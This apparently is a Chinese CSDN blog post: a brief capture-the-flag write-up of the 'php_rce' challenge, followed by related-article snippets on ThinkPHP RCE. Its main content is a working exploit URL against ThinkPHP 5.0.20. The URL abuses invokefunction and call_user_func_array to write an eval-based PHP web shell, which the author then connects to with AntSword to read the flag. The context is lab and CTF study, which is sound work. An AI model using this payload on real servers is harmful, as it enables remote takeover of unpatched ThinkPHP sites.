php_rce ,thinkPHP—v5.0.20,getshell

已于 2024-11-28 11:31:37 修改
阅读量175 收藏
点赞数 3
文章标签: 网络安全
于 2024-11-20 17:31:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40643324/article/details/143920994
版权

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=test.php&vars[1][]=<?php highlight_file(__FILE__);@eval($_POST[sss]);?>

直接添加到网站后访问:

返回了个数字:
在这里插入图片描述
蚁剑连接,注意访问写入的文件:/test.php
在这里插入图片描述
在根目录下找到flag
在这里插入图片描述

BinJazz
关注
网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 7864
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
ThinkPHP5远程代码执行漏洞(call_user_func_array、invokefunction、vars)
墨痕诉清风的博客
07-15 492
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
ThinkPHP5 5.0.20 远程代码执行漏洞
weixin_51387754的博客
01-02 1816
漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 漏洞复现 运行ThinkPHP 5.0.20版本: docker-compose up -d 环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。 一.进行url拼接可看到phpinfo页面 http://127.0.0.1:8080/index.php?s=/Index/
XCTF篇:Web (高手进阶区) 3 ThinkPHP5.0.20远程命令执行漏洞复现
小明师傅博客
06-21 1367
3.php_rce 感觉是让我找ThinkPHP V5的漏洞?? 但我连ThinkPHP V5是什么都不知道== 对我这小白一点也不友好 搜索发现框架和cms的区别 框架就是提供一个快速bai敏捷开发的平台,里面一些常du用的功zhi能,都封装好,然后你要按照框架的语法和文件结dao构来进行网站的建设,就好比是搭建了一个房子外面的框架都设计好,你需要做的是修改里面的东西. 而cms是将整个房间,不仅框架搭建好了.里面的各个房间也给你布置好,可以不经过任何加工直接可以入住. 两者的优缺点是: 框架相对比较灵
Thinkphp5.0.20漏洞复现
Amateur
09-13 2943
thinkphp5.0.20漏洞复现 本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担 漏洞描述:ThinkPHP5.0在核心代码中实现了表单请求类型伪装的功能,该功能利用$_POST['_method']变量来传递真实的请求方法,当攻击者设置$_POST['_method']=__construct时,Request类的method方法便会将该类的变量进行覆盖,攻击者利用该方式将filter变量覆盖为system等函数名,当内部进行参数过滤时
ThinkPHP5.0.20 自定义404页面
donglingjiu的博客
07-13 2525
1&gt;修改应用配置文件 config.php     1)关闭调试模式 2)新增配置 'http_exception_template'    对应的 文件路径自定义   2&gt;在上述配置路径下新增 页面404.htm...   如果在配置中 开启布局布局 layout之后  需要 给自定义的404页面加上{__NOLAYOUT__}就行了。 {__NOLAYOUT_...
thinkphp5 完整版 5.0.20
06-07
thinkphp5.0.20 with ext.
ThinkPHP v5.0.20 完整版
10-12
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
ThinkPHP v5.0.20 核心版
10-12
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
thinkphp5.0.20 数据库迁移/填充
anjinya的博客
06-10 677
thinkphp5.0.20中要使用数据库迁移的话,首先我们需要给thinkphp5进行一些插件的安装,这里我选用的是composer 第一步:在composer.json
ThinkPHP5.0.20+PHP+AJAX分类分页加载功能.
爱打echo的猴子
09-30 655
这个月公司下发的一个项目,需要做个信息交流网站,其中手机端加载使用的是瀑布流 第一时间想到的是插件,但是还是想自己动手写一下,不太想依赖插件。 需求是这样的:需要按照不同的标签使用瀑布流加载出不同的内容。用户点击某一个标签的时候,显示的内容也只能是跟这个标签相关的。如图:   如果没有数据,那么底部就提示没有数据了。   先说下思路,如果是ajax分页加载,没有分类的话,那么我们只...
【攻防世界CTF|web方向】第六题:php_rce
weixin_70825534的博客
08-06 1145
该漏洞是由于ThinkPHP5在处理控制器传参时,没有对参数进行充分的过滤与验证,导致恶意用户可以通过提交恶意数据,构造出一个带有PHP函数的控制器方法,并通过URL参数的形式访问该方法,从而触发远程代码执行漏洞。2.本题学习目标:掌握框架漏洞,知道某个网页使用的框架版本,就可以去百度该版本的漏洞,网上一抓一大把,从而就能够利用该漏洞获得想要的信息。发现题目场景中的thinkPHP版本是v5.0.20,而我们找的这个漏洞是未知版本的,可能不属于当前网页版本的漏洞,所以页面错误!有跟flag相关的东西。
ThinkPHP v5.0.15 完整版
02-06
软件介绍 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和 改进,众多的典型案例确保可以稳定用于商业以及门户级的开发。 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,在项目配置、类 库导入、模版引擎、查询语言、自动验证、视图模型、项目编译、缓存机制、SEO支持、分布式数据库、多数据库连接和切换、认证机制和扩展性方面均有独特的 表现。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用。当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单 和快速的特性中受益。ThinkPHP本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少的代码完成更多的功能,宗旨就是让WEB应 用开发更简单、更快速。为此ThinkPHP会不断吸收和融入更好的技术以保证其新鲜和活力,提供WEB应用开发的最佳实践! ThinkPHP遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产 品发布/销售。 ThinkPHP v5.0.15 更新日志: 改进View类 改进chunk方法 改进模板引擎的表达式语法 改进自关联查询多级调用问题 关联定义增加`selfRelation`方法用于设置是否自关联 改进file类型的缓存`inc`和`dec`方法不改变缓存有效期 改进软删除 支持设置`deleteTime`属性关闭 改进`union`查询 改进查询缓存 优化File缓存自动生成空目录的问题 改进日志写入并发问题 修正`MorphTo`关联 改进`join`自关联查询 改进`case`标签解析 改进Url类对`url_convert`配置的支持
thinkphp5.05.1 rce poc总结
热门推荐
weixin_40709439的博客
01-20 1万+
照搬Sp4ce大神的: https://bbs.ichunqiu.com/thread-49591-1-1.html 版本名 是否可被攻击 攻击条件 5.0.0 否 无 5.0.1 否 无 5.0.2 否 无 5.0.3 否 无 5.0.4 否 无 5.0.5 否 无 5.0...
Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)
墨痕诉清风的博客
11-07 4640
官方公告:1、2、POC:批量检测单个检测。
ThinkPHP5_RCE
最新发布
Dikesi的博客
02-10 419
ThinkPHP 5.x版本 RCE漏洞
thinkphp 5-rcerce漏洞getshell
weixin_51692662的博客
11-03 4129
thinkphp 5-rcerce漏洞getshell
Thinkphp5x远程执行命令及getshell
2201_75891821的博客
08-07 827
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
ThinkPHP5.0.0~5.0.23路由控制不严谨导致的RCE
shelter1234567的博客
01-22 1438
本次我们继续以漏洞挖掘者的视角,来分析thinkphpRCE
thinkphp2_rce_2漏洞
05-02
thinkphp2_rce_2是指ThinkPHP 2.1.0至2.1.2版本中存在的一种远程命令执行漏洞。攻击者可以通过精心构造的请求,将恶意代码注入到目标服务器上,并执行任意命令。这个漏洞的原因是由于ThinkPHP在处理控制器的参数时,没有对参数进行过滤和检查,导致攻击者可以通过构造的参数来执行任意的命令。该漏洞已经被修复,请尽快升级到最新版本的ThinkPHP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值